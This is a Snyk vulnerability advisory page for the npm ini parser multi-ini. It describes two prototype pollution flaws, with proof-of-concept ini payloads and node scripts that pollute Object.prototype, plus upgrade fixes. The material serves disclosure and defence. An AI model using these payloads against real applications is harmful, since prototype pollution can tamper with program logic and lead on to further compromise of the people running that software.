multi-ini 0.2.3 vulnerabilities

Direct Vulnerabilities

Known vulnerabilities in the multi-ini package. This does not include vulnerabilities belonging to this package’s dependencies.

Fix vulnerabilities automatically

Snyk's AI Trust Platform automatically finds the best upgrade path and integrates with your development workflows. Secure your code at zero cost.

Fix for free

Vulnerability	Vulnerable Version
M Prototype Pollution multi-ini is an ini-file parser which supports multi line, multiple levels and arrays to get a maximum of compatibility with Zend config files. Affected versions of this package are vulnerable to Prototype Pollution. It is possible to pollute an object's prototype by specifying the proto object as part of an array. PoC by Eugene Lim: payload.ini `[__proto__] polluted = "polluted"` poc.js: `var ini = require('multi-ini') var parsed = ini.read('./payload.toml', { encoding: 'utf8' }) console.log(parsed) console.log(parsed.__proto__) console.log({}.__proto__) console.log(polluted)` `> node poc.js {} { polluted: 'polluted' } { polluted: 'polluted' } polluted` How to fix Prototype Pollution? Upgrade `multi-ini` to version 2.1.1 or higher.	<2.1.1
M Prototype Pollution multi-ini is an ini-file parser which supports multi line, multiple levels and arrays to get a maximum of compatibility with Zend config files. Affected versions of this package are vulnerable to Prototype Pollution. It is possible to pollute an object's prototype by specifying the `constructor.proto` object as part of an array. This is a bypass of `CVE-2020-28448`. PoC `$ cat payload.2.ini [constructor] prototype.polluted = polluted $ cat poc.multi-ini.js const ini = require('multi-ini'); console.log('Before:', {}.polluted); var content = ini.read('payload.2.ini'); console.log('After:', {}.polluted);` How to fix Prototype Pollution? Upgrade `multi-ini` to version 2.1.2 or higher.	<2.1.2

Vulnerability

Vulnerable Version

Prototype Pollution

multi-ini is an ini-file parser which supports multi line, multiple levels and arrays to get a maximum of compatibility with Zend config files.

Affected versions of this package are vulnerable to Prototype Pollution. It is possible to pollute an object's prototype by specifying the proto object as part of an array.

PoC by Eugene Lim:

payload.ini

[__proto__]
polluted = "polluted"

poc.js:

var ini = require('multi-ini')

var parsed = ini.read('./payload.toml', { encoding: 'utf8' })
console.log(parsed)
console.log(parsed.__proto__)
console.log({}.__proto__)
console.log(polluted)

> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted

How to fix Prototype Pollution?

Upgrade multi-ini to version 2.1.1 or higher.

<2.1.1

Prototype Pollution

multi-ini is an ini-file parser which supports multi line, multiple levels and arrays to get a maximum of compatibility with Zend config files.

Affected versions of this package are vulnerable to Prototype Pollution. It is possible to pollute an object's prototype by specifying the constructor.proto object as part of an array. This is a bypass of CVE-2020-28448.

PoC

$ cat payload.2.ini
[constructor]
prototype.polluted = polluted

$ cat poc.multi-ini.js
const ini = require('multi-ini');
console.log('Before:', {}.polluted);
var content = ini.read('payload.2.ini');
console.log('After:', {}.polluted);

How to fix Prototype Pollution?

Upgrade multi-ini to version 2.1.2 or higher.

<2.1.2

multi-ini@0.2.3 vulnerabilities

An ini-file parser which supports multi line, multiple levels and arrays to get a maximum of compatibility with Zend config files.

latest version

latest non vulnerable version

first published

latest version published

licenses detected

Direct Vulnerabilities

Fix vulnerabilities automatically

PoC by Eugene Lim:

PoC